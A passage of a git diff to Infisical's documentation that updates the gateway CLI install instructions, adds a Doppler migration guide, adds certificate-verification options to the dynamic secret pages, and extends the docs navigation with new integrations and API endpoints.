Infisical. + + The enrollment method to use. Currently only `token` is supported. ```bash # Example - sudo infisical gateway systemd install --token= --name= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` - You may also expose the token to the CLI by setting the environment variable `INFISICAL_TOKEN` before executing the install command. - - - Domain of your self-hosted Infisical instance. + + The one-time enrollment token from the Infisical UI. ```bash # Example - sudo infisical gateway systemd install --domain=https://app.your-domain.com --name= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` - - The name of the gateway instance. + + Domain of your self-hosted Infisical instance. ```bash # Example - sudo infisical gateway systemd install --name=my-gateway --token= + sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain=https://app.your-domain.com ``` @@ -343,7 +160,7 @@ sudo infisical gateway systemd install --token= --domain= --name= ```bash # Example - sudo infisical gateway systemd install --target-relay-name=my-relay --token= --name= + sudo infisical gateway systemd install my-gateway --target-relay-name=my-relay --enroll-method=token --token= --domain= ``` **Note:** For Infisical Cloud users using instance relays, the relay infrastructure is already running and managed by Infisical. If using organization relays or self-hosted instance relays, you must first start a relay server. For more information on deploying relays, refer to the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). @@ -397,204 +214,6 @@ Run the legacy Infisical gateway in the foreground. The gateway will connect to infisical gateway --domain= --auth-method= ``` -### Authentication - -The Infisical CLI supports multiple authentication methods. Below are the available authentication methods, with their respective flags. - - - - The Universal Auth method is a simple and secure way to authenticate with Infisical. It requires a client ID and a client secret to authenticate with Infisical. - - - - - Your machine identity client ID. - - - Your machine identity client secret. - - - The authentication method to use. Must be `universal-auth` when using Universal Auth. - - - - - ```bash - infisical gateway --auth-method=universal-auth --client-id= --client-secret= - ``` - - - - The Native Kubernetes method is used to authenticate with Infisical when running in a Kubernetes environment. It requires a service account token to authenticate with Infisical. - - - - - Your machine identity ID. - - - Path to the Kubernetes service account token to use. Default: `/var/run/secrets/kubernetes.io/serviceaccount/token`. - - - The authentication method to use. Must be `kubernetes` when using Native Kubernetes. - - - - - - - ```bash - infisical gateway --auth-method=kubernetes --machine-identity-id= - ``` - - - - The Native Azure method is used to authenticate with Infisical when running in an Azure environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `azure` when using Native Azure. - - - - - - - ```bash - infisical gateway --auth-method=azure --machine-identity-id= - ``` - - - - The Native GCP ID Token method is used to authenticate with Infisical when running in a GCP environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `gcp-id-token` when using Native GCP ID Token. - - - - - - - ```bash - infisical gateway --auth-method=gcp-id-token --machine-identity-id= - ``` - - - - The GCP IAM method is used to authenticate with Infisical with a GCP service account key. - - - - - Your machine identity ID. - - - Path to your GCP service account key file _(Must be in JSON format!)_ - - - The authentication method to use. Must be `gcp-iam` when using GCP IAM. - - - - - ```bash - infisical gateway --auth-method=gcp-iam --machine-identity-id= --service-account-key-file-path= - ``` - - - - The AWS IAM method is used to authenticate with Infisical with an AWS IAM role while running in an AWS environment like EC2, Lambda, etc. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `aws-iam` when using Native AWS IAM. - - - - - ```bash - infisical gateway --auth-method=aws-iam --machine-identity-id= - ``` - - - - The OIDC Auth method is used to authenticate with Infisical via identity tokens with OIDC. - - - - - Your machine identity ID. - - - The OIDC JWT from the identity provider. - - - The authentication method to use. Must be `oidc-auth` when using OIDC Auth. - - - - - ```bash - infisical gateway --auth-method=oidc-auth --machine-identity-id= --jwt= - ``` - - - - - The JWT Auth method is used to authenticate with Infisical via a JWT token. - - - - - The JWT token to use for authentication. - - - Your machine identity ID. - - - The authentication method to use. Must be `jwt-auth` when using JWT Auth. - - - - - - ```bash - infisical gateway --auth-method=jwt-auth --jwt= --machine-identity-id= - ``` - - - - You can use the `INFISICAL_TOKEN` environment variable to authenticate with Infisical with a raw machine identity access token. - - - - - The machine identity access token to use for authentication. - - - - - ```bash - infisical gateway --token= - ``` - - - - ### Other Flags @@ -632,32 +251,6 @@ sudo infisical gateway install --token= --domain= - Must be run with root/sudo privileges - Requires systemd -### Flags - - - - The machine identity access token to authenticate with Infisical. - - ```bash - # Example - sudo infisical gateway install --token= - ``` - - You may also expose the token to the CLI by setting the environment variable `INFISICAL_TOKEN` before executing the install command. - - - - - Domain of your self-hosted Infisical instance. - - ```bash - # Example - sudo infisical gateway install --domain=https://app.your-domain.com - ``` - - - - ### Service Details The systemd service is installed with secure defaults: @@ -686,10 +279,16 @@ sudo systemctl disable infisical-gateway # Disable auto-start on boot ## Frequently Asked Questions + + Yes. The CLI stores the enrollment token locally after the first successful enrollment. If you run the same command again with the same `--token` value, it detects the token has already been used and skips enrollment, proceeding directly to start the gateway. This means you can safely use the same command (e.g., via up-arrow in your shell) without getting "token already used" or "token expired" errors. + If the `--target-relay-name` flag is omitted, the gateway automatically selects the optimal relay. It first checks for healthy organization relays and connects to the one with the lowest latency. If no organization relays are available, it then performs the same latency-based selection among the available managed relays. No. The first time the gateway starts, it selects the optimal relay (based on latency) and caches that selection. On subsequent restarts, it will prioritize connecting to the cached relay. If it's unable to connect, it will then re-evaluate and connect to the next most optimal relay available. + + Yes. Additional gateway authentication methods are planned for future releases. + diff --git a/docs/docs.json b/docs/docs.json index f00db502ad8..c8703ba396c 100644 --- a/docs/docs.json +++ b/docs/docs.json @@ -124,7 +124,9 @@ "integrations/app-connections/cloudflare", "integrations/app-connections/databricks", "integrations/app-connections/dbt", + "integrations/app-connections/digicert", "integrations/app-connections/digital-ocean", + "integrations/app-connections/doppler", "integrations/app-connections/dns-made-easy", "integrations/app-connections/flyio", "integrations/app-connections/gcp", @@ -144,6 +146,7 @@ "integrations/app-connections/netlify", "integrations/app-connections/netscaler", "integrations/app-connections/northflank", + "integrations/app-connections/ona", "integrations/app-connections/oci", "integrations/app-connections/octopus-deploy", "integrations/app-connections/okta", @@ -156,7 +159,9 @@ "integrations/app-connections/supabase", "integrations/app-connections/teamcity", "integrations/app-connections/terraform-cloud", + "integrations/app-connections/travis-ci", "integrations/app-connections/venafi", + "integrations/app-connections/venafi-tpp", "integrations/app-connections/vercel", "integrations/app-connections/windmill", "integrations/app-connections/smb", @@ -177,6 +182,7 @@ "group": "External Migrations", "pages": [ "documentation/platform/external-migrations/overview", + "documentation/platform/external-migrations/doppler", "documentation/platform/external-migrations/envkey", "documentation/platform/external-migrations/vault" ] @@ -193,6 +199,7 @@ "group": "Gateway", "pages": [ "documentation/platform/gateways/overview", + "documentation/platform/gateways/gateway-pools", "documentation/platform/gateways/gateway-deployment", { "group": "Relay Deployment", @@ -478,6 +485,7 @@ "documentation/platform/secret-rotation/oracledb-credentials", "documentation/platform/secret-rotation/postgres-credentials", "documentation/platform/secret-rotation/redis-credentials", + "documentation/platform/secret-rotation/supabase-api-key", "documentation/platform/secret-rotation/unix-linux-local-account", "documentation/platform/secret-rotation/windows-local-account" ] @@ -596,6 +604,7 @@ "integrations/secret-syncs/laravel-forge", "integrations/secret-syncs/netlify", "integrations/secret-syncs/northflank", + "integrations/secret-syncs/ona", "integrations/secret-syncs/oci-vault", "integrations/secret-syncs/octopus-deploy", "integrations/secret-syncs/railway", @@ -603,6 +612,7 @@ "integrations/secret-syncs/supabase", "integrations/secret-syncs/teamcity", "integrations/secret-syncs/terraform-cloud", + "integrations/secret-syncs/travis-ci", "integrations/secret-syncs/vercel", "integrations/secret-syncs/windmill", "integrations/secret-syncs/zabbix" @@ -830,10 +840,13 @@ "documentation/platform/pki/ca/acme-ca", "documentation/platform/pki/ca/lets-encrypt", "documentation/platform/pki/ca/digicert", + "documentation/platform/pki/ca/digicert-direct", "documentation/platform/pki/ca/sectigo", "documentation/platform/pki/ca/azure-adcs", "documentation/platform/pki/ca/aws-pca", - "documentation/platform/pki/ca/venafi" + "documentation/platform/pki/ca/aws-acm-public-ca", + "documentation/platform/pki/ca/venafi", + "documentation/platform/pki/ca/venafi-tpp" ] } ] @@ -917,29 +930,9 @@ ] }, { - "item": "Agent Sentinel", - "groups": [ - { - "group": "Agent Sentinel", - "pages": [ - "documentation/platform/agent-sentinel/overview", - { - "group": "Concepts", - "pages": [ - "documentation/platform/agent-sentinel/concepts/mcp-overview" - ] - } - ] - }, - { - "group": "Product Reference", - "pages": [ - "documentation/platform/agent-sentinel/mcp-servers", - "documentation/platform/agent-sentinel/mcp-endpoints", - "documentation/platform/agent-sentinel/activity-logs" - ] - } - ] + "item": "Agent Vault", + "icon": "arrow-up-right-from-square", + "href": "https://docs.agent-vault.dev/" } ] }, @@ -1469,6 +1462,18 @@ "api-reference/endpoints/app-connections/dbt/delete" ] }, + { + "group": "DigiCert", + "pages": [ + "api-reference/endpoints/app-connections/digicert/list", + "api-reference/endpoints/app-connections/digicert/available", + "api-reference/endpoints/app-connections/digicert/get-by-id", + "api-reference/endpoints/app-connections/digicert/get-by-name", + "api-reference/endpoints/app-connections/digicert/create", + "api-reference/endpoints/app-connections/digicert/update", + "api-reference/endpoints/app-connections/digicert/delete" + ] + }, { "group": "Digital Ocean", "pages": [ @@ -1481,6 +1486,18 @@ "api-reference/endpoints/app-connections/digital-ocean/delete" ] }, + { + "group": "Doppler", + "pages": [ + "api-reference/endpoints/app-connections/doppler/list", + "api-reference/endpoints/app-connections/doppler/available", + "api-reference/endpoints/app-connections/doppler/get-by-id", + "api-reference/endpoints/app-connections/doppler/get-by-name", + "api-reference/endpoints/app-connections/doppler/create", + "api-reference/endpoints/app-connections/doppler/update", + "api-reference/endpoints/app-connections/doppler/delete" + ] + }, { "group": "Fly.io", "pages": [ @@ -2349,6 +2366,19 @@ "api-reference/endpoints/secret-rotations/redis-credentials/update" ] }, + { + "group": "Supabase API Key", + "pages": [ + "api-reference/endpoints/secret-rotations/supabase-api-key/create", + "api-reference/endpoints/secret-rotations/supabase-api-key/delete", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name", + "api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id", + "api-reference/endpoints/secret-rotations/supabase-api-key/list", + "api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets", + "api-reference/endpoints/secret-rotations/supabase-api-key/update" + ] + }, { "group": "HP iLO Local Account", "pages": [ @@ -2930,6 +2960,26 @@ "api-reference/endpoints/certificate-authorities/aws-pca/delete" ] }, + { + "group": "DigiCert", + "pages": [ + "api-reference/endpoints/certificate-authorities/digicert/list", + "api-reference/endpoints/certificate-authorities/digicert/create", + "api-reference/endpoints/certificate-authorities/digicert/read", + "api-reference/endpoints/certificate-authorities/digicert/update", + "api-reference/endpoints/certificate-authorities/digicert/delete" + ] + }, + { + "group": "AWS ACM Public CA", + "pages": [ + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update", + "api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete" + ] + }, { "group": "Internal", "pages": [ @@ -3239,7 +3289,8 @@ "api-reference/endpoints/kms/keys/update", "api-reference/endpoints/kms/keys/delete", "api-reference/endpoints/kms/keys/public-key", - "api-reference/endpoints/kms/keys/private-key" + "api-reference/endpoints/kms/keys/private-key", + "api-reference/endpoints/kms/keys/bulk-export-private-keys" ] }, { @@ -3259,6 +3310,23 @@ } ] }, + { + "group": "External Migrations", + "pages": [ + { + "group": "Doppler", + "pages": [ + "api-reference/endpoints/external-migrations/doppler/get-configs", + "api-reference/endpoints/external-migrations/doppler/create-config", + "api-reference/endpoints/external-migrations/doppler/update-config", + "api-reference/endpoints/external-migrations/doppler/delete-config", + "api-reference/endpoints/external-migrations/doppler/get-projects", + "api-reference/endpoints/external-migrations/doppler/get-environments", + "api-reference/endpoints/external-migrations/doppler/import-secrets" + ] + } + ] + }, { "group": "Other", "pages": [ diff --git a/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx b/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx index b2a1ccb964e..36386e3ff57 100644 --- a/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx +++ b/docs/documentation/platform/audit-log-streams/audit-log-streams.mdx @@ -122,7 +122,6 @@ This prevents audit logs from being written to PostgreSQL while still streaming "userAgentType": "web", "eventType": "get-secrets", "eventMetadata": {}, - "projectName": "MyProject", "orgId": "00000000-0000-0000-0000-000000000000", "projectId": "00000000-0000-0000-0000-000000000000", "TimeGenerated": "2025-01-01T00:00:00.000Z" @@ -326,8 +325,7 @@ This prevents audit logs from being written to PostgreSQL while still streaming "createdAt": "2025-01-15T01:11:25.552Z", "updatedAt": "2025-01-15T01:11:25.552Z", "orgId": "785649f1-ff4b-4ef9-a40a-9b9878e46e57", - "projectId": "09bfcc01-0917-4bea-9c7a-2d320584d5b1", - "projectName": "example-project" + "projectId": "09bfcc01-0917-4bea-9c7a-2d320584d5b1" } ``` @@ -433,8 +431,4 @@ This prevents audit logs from being written to PostgreSQL while still streaming The `projectId` field will only be present if the event occurred at the project level, not the organization level. - - The name of the project where the event occurred. - The `projectName` field will only be present if the event occurred at the project level, not the organization level. - diff --git a/docs/documentation/platform/audit-logs.mdx b/docs/documentation/platform/audit-logs.mdx index 3352d944721..80a31f86121 100644 --- a/docs/documentation/platform/audit-logs.mdx +++ b/docs/documentation/platform/audit-logs.mdx @@ -58,7 +58,6 @@ Each log contains the following data: "updatedAt": "[TIMESTAMP]", "orgId": "[ORGANIZATION_UUID]", "projectId": "[PROJECT_UUID]", - "projectName": "[PROJECT_NAME]", "event": { "type": "get-secrets", "metadata": { diff --git a/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx b/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx index b95cadf015d..7c3a7bc160b 100644 --- a/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx +++ b/docs/documentation/platform/dynamic-secrets/azure-sql-database.mdx @@ -85,6 +85,10 @@ The user needs: SSL certificate authority certificate. For Azure SQL Database, this is typically not required as Azure manages the certificates. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/azure-sql-database/create-dynamic-secret-form.png) diff --git a/docs/documentation/platform/dynamic-secrets/cassandra.mdx b/docs/documentation/platform/dynamic-secrets/cassandra.mdx index b5251a346fe..41356838244 100644 --- a/docs/documentation/platform/dynamic-secrets/cassandra.mdx +++ b/docs/documentation/platform/dynamic-secrets/cassandra.mdx @@ -76,6 +76,10 @@ The above configuration allows user creation and granting permissions. A CA may be required if your cassandra requires it for incoming connections. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-cassandra.png) diff --git a/docs/documentation/platform/dynamic-secrets/elastic-search.mdx b/docs/documentation/platform/dynamic-secrets/elastic-search.mdx index e27b030b496..c701d3f106d 100644 --- a/docs/documentation/platform/dynamic-secrets/elastic-search.mdx +++ b/docs/documentation/platform/dynamic-secrets/elastic-search.mdx @@ -89,6 +89,9 @@ The port that your Elasticsearch instance is running on. _(Example: 9200)_ A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-input-modal-elastic-search.png) diff --git a/docs/documentation/platform/dynamic-secrets/kubernetes.mdx b/docs/documentation/platform/dynamic-secrets/kubernetes.mdx index a7d16b11104..7f02faf0fd2 100644 --- a/docs/documentation/platform/dynamic-secrets/kubernetes.mdx +++ b/docs/documentation/platform/dynamic-secrets/kubernetes.mdx @@ -432,6 +432,9 @@ This feature is ideal for scenarios where you need to: Custom CA certificate for the Kubernetes API server. Leave blank to use the system/public CA. Not required when using Gateway authentication as the Gateway will use its internal TLS configuration. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + Choose between Token (API) or Gateway authentication. If using Gateway, the Gateway must be deployed in your Kubernetes cluster. diff --git a/docs/documentation/platform/dynamic-secrets/ldap.mdx b/docs/documentation/platform/dynamic-secrets/ldap.mdx index f1b0569f109..578ac59a1b4 100644 --- a/docs/documentation/platform/dynamic-secrets/ldap.mdx +++ b/docs/documentation/platform/dynamic-secrets/ldap.mdx @@ -56,6 +56,10 @@ The Infisical LDAP dynamic secret allows you to generate user credentials on dem CA certificate to use for TLS in case of a secure connection. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + The type of LDAP credential - select Dynamic. @@ -197,6 +201,10 @@ The Infisical LDAP dynamic secret allows you to generate user credentials on dem CA certificate to use for TLS in case of a secure connection. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + The type of LDAP credential - select Static. diff --git a/docs/documentation/platform/dynamic-secrets/mongo-db.mdx b/docs/documentation/platform/dynamic-secrets/mongo-db.mdx index b3112ce2622..191b6591c21 100644 --- a/docs/documentation/platform/dynamic-secrets/mongo-db.mdx +++ b/docs/documentation/platform/dynamic-secrets/mongo-db.mdx @@ -68,6 +68,9 @@ Create a user with the required permission in your MongoDB instance. This user w A CA may be required if your DB requires it for incoming connections. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-mongodb.png) diff --git a/docs/documentation/platform/dynamic-secrets/mssql.mdx b/docs/documentation/platform/dynamic-secrets/mssql.mdx index 31b220e86a8..94d90b7e033 100644 --- a/docs/documentation/platform/dynamic-secrets/mssql.mdx +++ b/docs/documentation/platform/dynamic-secrets/mssql.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-mssql.png) diff --git a/docs/documentation/platform/dynamic-secrets/mysql.mdx b/docs/documentation/platform/dynamic-secrets/mysql.mdx index 475f7e338df..5de49177d4e 100644 --- a/docs/documentation/platform/dynamic-secrets/mysql.mdx +++ b/docs/documentation/platform/dynamic-secrets/mysql.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Modify SQL Statements Modal](../../../images/platform/dynamic-secrets/modify-sql-statement-mysql.png) diff --git a/docs/documentation/platform/dynamic-secrets/oracle.mdx b/docs/documentation/platform/dynamic-secrets/oracle.mdx index 74e139a013c..43cc8f50419 100644 --- a/docs/documentation/platform/dynamic-secrets/oracle.mdx +++ b/docs/documentation/platform/dynamic-secrets/oracle.mdx @@ -68,6 +68,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-oracle.png) diff --git a/docs/documentation/platform/dynamic-secrets/postgresql.mdx b/docs/documentation/platform/dynamic-secrets/postgresql.mdx index 9785e7d6692..bf190f05b34 100644 --- a/docs/documentation/platform/dynamic-secrets/postgresql.mdx +++ b/docs/documentation/platform/dynamic-secrets/postgresql.mdx @@ -69,6 +69,10 @@ Create a user with the required permission in your SQL instance. This user will A CA may be required if your DB requires it for incoming connections. AWS RDS instances with default settings will requires a CA which can be downloaded [here](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.SSL.html#UsingWithRDS.SSL.CertificatesAllRegions). + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-postgresql.png) diff --git a/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx b/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx index 42c7a2d8785..4063d150381 100644 --- a/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx +++ b/docs/documentation/platform/dynamic-secrets/rabbit-mq.mdx @@ -73,6 +73,10 @@ The port that the RabbitMQ management plugin is listening on. This is `15672` by A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-input-modal-rabbit-mq.png) diff --git a/docs/documentation/platform/dynamic-secrets/redis.mdx b/docs/documentation/platform/dynamic-secrets/redis.mdx index 12ede82b91b..ab58c80723a 100644 --- a/docs/documentation/platform/dynamic-secrets/redis.mdx +++ b/docs/documentation/platform/dynamic-secrets/redis.mdx @@ -56,6 +56,10 @@ Create a user with the required permission in your Redis instance. This user wil A CA may be required if your DB requires it for incoming connections. This is often the case when connecting to a managed service. + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Modify Redis Statements Modal](/images/platform/dynamic-secrets/modify-redis-statement.png) diff --git a/docs/documentation/platform/dynamic-secrets/sap-hana.mdx b/docs/documentation/platform/dynamic-secrets/sap-hana.mdx index 0d2348a8f7e..b0c12170e36 100644 --- a/docs/documentation/platform/dynamic-secrets/sap-hana.mdx +++ b/docs/documentation/platform/dynamic-secrets/sap-hana.mdx @@ -61,6 +61,10 @@ The Infisical SAP HANA dynamic secret allows you to generate SAP HANA database c + + If enabled, the server certificate will be verified against the list of supplied CAs. Disable this option if you are using a self-signed certificate. + + ![Dynamic Secret Setup Modal](../../../images/platform/dynamic-secrets/dynamic-secret-setup-modal-sap-hana.png) diff --git a/docs/documentation/platform/external-migrations/doppler.mdx b/docs/documentation/platform/external-migrations/doppler.mdx new file mode 100644 index 00000000000..4f8f3b3e6d3 --- /dev/null +++ b/docs/documentation/platform/external-migrations/doppler.mdx @@ -0,0 +1,80 @@ +--- +title: "Migrating from Doppler to Infisical" +sidebarTitle: "Doppler" +description: "Learn how to migrate secrets from Doppler to Infisical using in-platform migration." +--- + +This guide helps you bring secrets from **Doppler** into Infisical. Register a Doppler **App Connection** once, link it under **External Migrations**, then import secrets on demand β€” from the organization settings or directly from a project’s secret overview β€” into any Infisical project, environment, and folder you choose. + +**What you can migrate:** + +- **Secrets** β€” Key/value pairs from a Doppler **project** and **config** (root or branch) are imported into a chosen Infisical **project**, **environment**, and **secret path** (folder). Both root configs and branched configs are supported. + + + Organization Admin Access Required: Creating and managing Doppler migration + configurations, listing Doppler projects and environments, and running + in-platform imports are limited to organization administrators, matching + the Vault in-platform migration model. + + +## Set Up Your Doppler Connection + + + + In **Doppler**, create an API token that can read the projects and configs you plan to import (for example a **Personal** or **Service** token with access to the right projects). + + Store the token securely; you will paste it into Infisical in the next step. + + + + + In Infisical, open **Organization Settings > App Connections** and add a new connection with the **Doppler** type. + + Provide the token and complete the connection flow. The connection is reused anywhere Infisical needs to talk to Doppler for migration. + + + + + Go to **Organization Settings > External Migrations**. + + Under **In-Platform Migration Tooling**, click **Add configuration**. In the provider chooser, select **Doppler**. + + ![Choose Doppler in the in-platform migration provider modal](/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png) + + Pick the **App Connection** you created (each row in the table is one linked connection). + + ![Doppler migration configuration modal](/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png) + + + If you need several Doppler sources (for example different credentials), add multiple **Doppler** rows from **Add configuration**; each row can use a different App Connection. + + + The **In-Platform Migration Tooling** table lists all configured platforms (Vault and Doppler) together: **Platform**, **Namespace** (Vault shows the namespace path; Doppler shows **β€”**), and **Connection**. + + + + +## Migrating Secrets from Doppler to Infisical + +When you are already in a **Secret Manager** project and have **one** environment selected (not β€œall environments”): + +1. Open the **Secret overview** for the folder path where you want the secrets. +2. Open the **Add Secret** split button (caret next to **Add Secret**). +3. Choose **Add from Doppler**. + +![Add from Doppler on the secret overview](/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png) + +4. Select the **Doppler project** and **config**; Infisical lists all configs including root configs and branch configs. Root configs are labeled with **(root)** for clarity. Infisical uses your linked migration configuration and imports into the **current** environment and path. + +![Import from Doppler modal on secret overview](/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png) + +## Next Steps + + + + Structure Infisical projects to mirror how you used Doppler projects and configs + + + Read imported secrets from applications using Infisical clients + + diff --git a/docs/documentation/platform/external-migrations/overview.mdx b/docs/documentation/platform/external-migrations/overview.mdx index d8e85fe9155..10b62c4147c 100644 --- a/docs/documentation/platform/external-migrations/overview.mdx +++ b/docs/documentation/platform/external-migrations/overview.mdx @@ -10,13 +10,19 @@ Infisical supports migrating resources from third-party secrets management platf Infisical offers two types of migration approaches: -- **In-Platform Migration Tooling**: Configure platform connections to enable granular, on-demand imports of secrets, policies, and configurations directly within the Infisical UI. This allows you to migrate resources incrementally as needed. +- **In-Platform Migration Tooling**: Connect supported platforms (for example HashiCorp Vault or Doppler) under **Organization Settings > External Migrations**, then run granular, on-demand imports of secretsβ€”and Vault-only features like policies and Kubernetes-related configurationβ€”directly in the Infisical UI. This allows you to migrate resources incrementally as needed. - **Bulk Data Import**: Perform one-time organization-level migrations to import all resources from external platforms at once. This is ideal for initial migrations when moving entirely to Infisical. ## Supported Platforms +**Bulk / one-shot organization import** + - [EnvKey](./envkey) -- [Vault](./vault) + +**In-platform migration (per-platform guides)** + +- [Vault](./vault) β€” KV secrets, Kubernetes auth and dynamic secret shapes, policy translation +- [Doppler](./doppler) β€” secrets from Doppler projects and environments We're always looking to add more migration paths for other providers. If we're missing a platform, please open an issue on our [GitHub repository](https://github.com/infisical/infisical/issues). diff --git a/docs/documentation/platform/external-migrations/vault.mdx b/docs/documentation/platform/external-migrations/vault.mdx index a67f2f30400..c6a0296ab7e 100644 --- a/docs/documentation/platform/external-migrations/vault.mdx +++ b/docs/documentation/platform/external-migrations/vault.mdx @@ -107,22 +107,22 @@ Before importing anything, you need to establish a secure connection between Inf - + Navigate to **Organization Settings > External Migrations** in Infisical. - Under the "In-Platform Migration Tooling" section for HashiCorp Vault, click **"+ Add Namespace"**. + Under **In-Platform Migration Tooling**, click **Add configuration**. In the provider chooser, select **HashiCorp Vault**. - ![In-Platform Migration Tooling](/images/platform/external-migrations/vault-in-platform/external-migration-overview.png) + ![Choose provider](/images/platform/external-migrations/vault-in-platform/select-migration-provider.png) - Configure your namespace: + Configure the Vault namespace entry: - ![Namespace Configuration](/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png) + ![Namespace configuration modal](/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png) - **Namespace**: Enter your Vault namespace path (e.g., `admin/namespace1`). If you intend to use the root namespace, set the namespace value to "root". - **Connection**: Select the App Connection you created in the previous step. - You can add multiple namespaces with different connections if you have multiple Vault instances or namespaces to migrate from. + You can add multiple Vault rows (different namespaces and/or connections) in the same table if you have several Vault instances or namespaces to migrate from. @@ -155,7 +155,11 @@ KV secrets are imported into a specific **environment** (e.g., Development, Stag ![Add Secret Dropdown](/images/platform/external-migrations/vault-in-platform/import-vault-secrets-option.png) -4. Choose your Vault namespace and the secret path you want to import (e.g., `secret/app/prod`) +4. Select your Vault namespace and one or more secret paths to import (for example, `secret/app/prod`). Keys are copied using their names from Vault. + + If you select multiple paths and the same key name exists in more than one of them, the import aborts and no secrets are saved. + + 5. Click **"Import Secrets"** ![Import Vault Secrets](/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png) diff --git a/docs/documentation/platform/gateways/gateway-deployment.mdx b/docs/documentation/platform/gateways/gateway-deployment.mdx index 0d81367754d..487eb9660fb 100644 --- a/docs/documentation/platform/gateways/gateway-deployment.mdx +++ b/docs/documentation/platform/gateways/gateway-deployment.mdx @@ -8,99 +8,23 @@ This guide covers everything you need to deploy and configure Infisical Gateways ## Deployment Steps -To successfully deploy an Infisical Gateway for use, follow these steps in order. - - - Create a machine identity with the correct permissions to create and manage gateways. This identity is used by the gateway to authenticate with Infisical and should be provisioned in advance. - The gateway supports several [machine identity auth methods](/documentation/platform/identities/machine-identities), as listed below. Choose the one that best fits your environment and set the corresponding environment variables when deploying the gateway. - - - - Simple and secure authentication using client ID and client secret. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=universal-auth` - - `INFISICAL_UNIVERSAL_AUTH_CLIENT_ID=` - - `INFISICAL_UNIVERSAL_AUTH_CLIENT_SECRET=` - - - - Direct authentication using a machine identity access token. - - **Environment Variables:** - - `INFISICAL_TOKEN=` - - - - Authentication using Kubernetes service account tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=kubernetes` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using AWS IAM roles. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=aws-iam` - - 